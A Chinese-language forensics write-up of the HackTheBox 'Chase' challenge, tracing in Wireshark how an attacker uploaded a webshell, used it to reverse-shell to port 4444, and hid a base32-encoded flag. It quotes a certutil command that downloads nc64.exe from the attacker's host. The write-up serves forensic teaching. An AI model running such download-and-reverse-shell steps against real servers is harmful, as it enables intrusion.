栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 运维 > Linux

[HackTheBox系列] 取证分析 - Chase Writeup

Linux 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

[HackTheBox系列] 取证分析 - Chase Writeup

文章目录
  • 题目
  • 数据包分析

题目

题目如上图,有一台Web服务器触发了反病毒告警,但所有的系统管理员都说没登录过这台服务器。在关闭服务器拷贝硬盘数据之前,我们已经进行了一次网络流量捕获。下面就使用Wireshark来分析这个PCAP数据包。看看到底发生了什么。

数据包分析

将下载好的pcap文件拖入Wireshark后,先使用 Statistics->Protocol Hierarchy ,对整个数据包的协议数据统计进行大致了解。

如上图,可以看到整个数据包中,TCP协议占比97.2%。在TCP协议数据里,HTTP数据占了相当一部分。

另外,通过观察,可以看到通信两端分别为IP 22.22.22.7 和 22.22.22.5 这两台主机。

可以先使用过滤器http查看下http的数据包。

如上图,可以看到22.22.22.7 这台主机一直在访问 22.22.22.5 这台主机的80端口,80端口对应着http服务。22.22.22.5这台应该就是引起告警的Web服务器。继续看下这些http流量,可以看到22.22.22.7 调用了一个上传接口/upload.aspx ,在POST请求包中查看上传的内容。为了让数据显示更加友好,这里选中数据包,右键,选择 Follow->HTTP Stream。


如上图,可以看到通过上传接口/upload.aspx 上传了一个webshell到Web服务器22.22.22.5 上,webshell的文件名为:cmd.aspx.

上传了webshell后,利用webshell去执行以下系统命令:

c:windowssystem32cmd.exe /c certutil -urlcache -split -f http://22.22.22.7/nc64.exe c:userspublicnc.exe

certutil命令用于在Windows环境下下载文件,类似Linux/Unix下的curl、wget。

参考:
https://www.ired.team/offensive-security/defense-evasion/downloading-file-with-certutil


从这里可以看到攻击者利用webshell,从22.22.22.7上下载nc命令程序到Web服务器22.22.22.5,可见22.22.22.7其实也已经被攻击者入侵,并当作跳板机,攻击内网的其它机器(比如这里的22.22.22.5)。

然后下一步就是通过webshell,在22.22.22.5上使用nc命令程序,将shell反弹到22.22.22.7 主机上,如下图:

得到反弹shell后,自然就是执行各种系统命令,那这些流量自然就是非HTTP的TCP流量了。从上图可知,反弹shell的目的端口是22.22.22.7的4444端口,所以这里使用过滤器过滤出相应的流量,如下图:

为了数据包显示更友好,右键选择:Follow->TCP Stream。


如上图,可以看到攻击者原本想使用powershell来下载 22.22.22.7上面的一个txt文件到 Web服务器22.22.22.5 上,但报错说找不到命令。故再次使用certutil命令来下载。

要下载的这个文件的文件名很长,像是一个加密后的字符串。笔者将它拷贝到CyberChef 进行解密。因为目前看不出它是用什么加密/编码方式进行的加密,所以这里选择 Magic 选项卡,“Magic” 功能可以根据输入的密文信息自动推测可能使用的加密方式,并使用对应的算法进行解密/解码。

如上图,可以看到CyberChef已经检测出这个密文是使用的base32进行编码的,解码后便得到这道题的flag。

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/887248.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号